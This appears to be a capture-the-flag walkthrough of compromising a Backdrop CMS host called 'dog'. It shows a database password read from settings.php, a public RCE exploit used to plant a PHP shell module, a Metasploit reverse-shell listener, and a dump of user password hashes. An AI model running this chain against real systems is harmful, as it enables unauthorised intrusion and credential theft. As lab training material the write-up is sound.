Foothold
❯ ls
core files index.php layouts LICENSE.txt README.md robots.txt settings.php sites themes
❯ cat settings.php
<?php
/**
* @file
* Main Backdrop CMS configuration file.
*/
/**
* Database configuration:
*
* Most sites can configure their database by entering the connection string
* below. If using primary/replica databases or multiple connections, see the
* advanced database documentation at
* https://api.backdropcms.org/database-configuration
*/
$database = 'mysql://root:[email protected]/backdrop';
$database_prefix = '';
We need a username
[email protected]:BackDropJ2024DS2024
❯ searchsploit -m 52021
Exploit: Backdrop CMS 1.27.1 - Authenticated Remote Command Execution (RCE)
URL: https://www.exploit-db.com/exploits/52021
Path: /usr/share/exploitdb/exploits/php/webapps/52021.py
Codes: N/A
Verified: True
File Type: Python script, Unicode text, UTF-8 text executable
Copied to: /home/adot/htb/dog/52021.py
❯ python 52021.py http://dog.htb
Backdrop CMS 1.27.1 - Remote Command Execution Exploit
Evil module generating...
Evil module generated! shell.zip
Go to http://dog.htb/admin/modules/install and upload the shell.zip for Manual Installation.
Your shell address: http://dog.htb/modules/shell/shell.php
❯ tar -czvf shell.tar shell
shell/
shell/shell.info
shell/shell.php
Visit http://dog.htb/modules/shell/shell.php
❯ msfconsole -q -x 'use exploit/multi/handler;set LHOST tun0; set LPORT 443; run'
[*] Using configured payload generic/shell_reverse_tcp
LHOST => tun0
LPORT => 443
[*] Started reverse TCP handler on 10.10.14.3:443
www-data@dog:/var/www/html$ grep bash /etc/passwd
grep bash /etc/passwd
root:x:0:0:root:/root:/bin/bash
jobert:x:1000:1000:jobert:/home/jobert:/bin/bash
johncusack:x:1001:1001:,,,:/home/johncusack:/bin/bash
mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| backdrop |
| information_schema |
| mysql |
| performance_schema |
| sys |
+--------------------+
5 rows in set (0.01 sec)
mysql> use backdrop;
use backdrop;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
show tables;
+-----------------------------+
| Tables_in_backdrop |
+-----------------------------+
| batch |
| cache |
| cache_admin_bar |
| field_revision_comment_body |
| field_revision_field_image |
<SNIP>
| taxonomy_term_hierarchy |
| tempstore |
| url_alias |
| users |
| users_roles |
| variable |
| watchdog |
+-----------------------------+
59 rows in set (0.00 sec)
mysql> select * from users;
select * from users;
+-----+-------------------+---------------------------------------------------------+----------------------------+-----------+------------------+------------+------------+------------+------------+--------+----------+----------+---------+----------------------------+------------+
| uid | name | pass | mail | signature | signature_format | created | changed | access | login | status | timezone | language | picture | init | data |
+-----+-------------------+---------------------------------------------------------+----------------------------+-----------+------------------+------------+------------+------------+------------+--------+----------+----------+---------+----------------------------+------------+
| 0 | | | | | NULL | 0 | 0 | 0 | 0 | 0 | NULL | | 0 | | NULL |
| 1 | jPAdminB | $S$E7dig1GTaGJnzgAXAtOoPuaTjJ05fo8fH9USc6vO87T./ffdEr/. | [email protected] | | NULL | 1720548614 | 1720584122 | 1720714603 | 1720584166 | 1 | UTC | | 0 | [email protected] | 0x623A303B |
| 2 | jobert | $S$E/F9mVPgX4.dGDeDuKxPdXEONCzSvGpjxUeMALZ2IjBrve9Rcoz1 | [email protected] | | NULL | 1720584462 | 1720584462 | 1720632982 | 1720632780 | 1 | UTC | | 0 | [email protected] | NULL |
| 3 | dogBackDropSystem | $S$EfD1gJoRtn8I5TlqPTuTfHRBFQWL3x6vC5D3Ew9iU4RECrNuPPdD | [email protected] | | NULL | 1720632880 | 1720632880 | 1723752097 | 1723751569 | 1 | UTC | | 0 | [email protected] | NULL |
| 5 | john | $S$EYniSfxXt8z3gJ7pfhP5iIncFfCKz8EIkjUD66n/OTdQBFklAji. | [email protected] | | NULL | 1720632910 | 1720632910 | 0 | 0 | 1 | UTC | | 0 | [email protected] | NULL |
| 6 | morris | $S$E8OFpwBUqy/xCmMXMqFp3vyz1dJBifxgwNRMKktogL7VVk7yuulS | [email protected] | | NULL | 1720632931 | 1720632931 | 0 | 0 | 1 | UTC | | 0 | [email protected] | NULL |
| 7 | axel | $S$E/DHqfjBWPDLnkOP5auHhHDxF4U.sAJWiODjaumzxQYME6jeo9qV | [email protected] | | NULL | 1720632952 | 1720632952 | 0 | 0 | 1 | UTC | | 0 | [email protected] | NULL |
| 8 | rosa | $S$EsV26QVPbF.s0UndNPeNCxYEP/0z2O.2eLUNdKW/xYhg2.lsEcDT | [email protected] | | NULL | 1720632982 | 1720632982 | 0 | 0 | 1 | UTC | | 0 | [email protected] | NULL |
| 10 | tiffany | $S$EEAGFzd8HSQ/IzwpqI79aJgRvqZnH4JSKLv2C83wUphw0nuoTY8v | [email protected] | | NULL | 1723752136 | 1723752136 | 1749273564 | 1749272404 | 1 | UTC | | 0 | [email protected] | NULL |
+-----+-------------------+---------------------------------------------------------+----------------------------+-----------+------------------+------------+------------+------------+------------+--------+----------+----------+---------+----------------------------+------------+
9 rows in set (0.00 sec)
SQL enum led nowhere lol
Last updated
Was this helpful?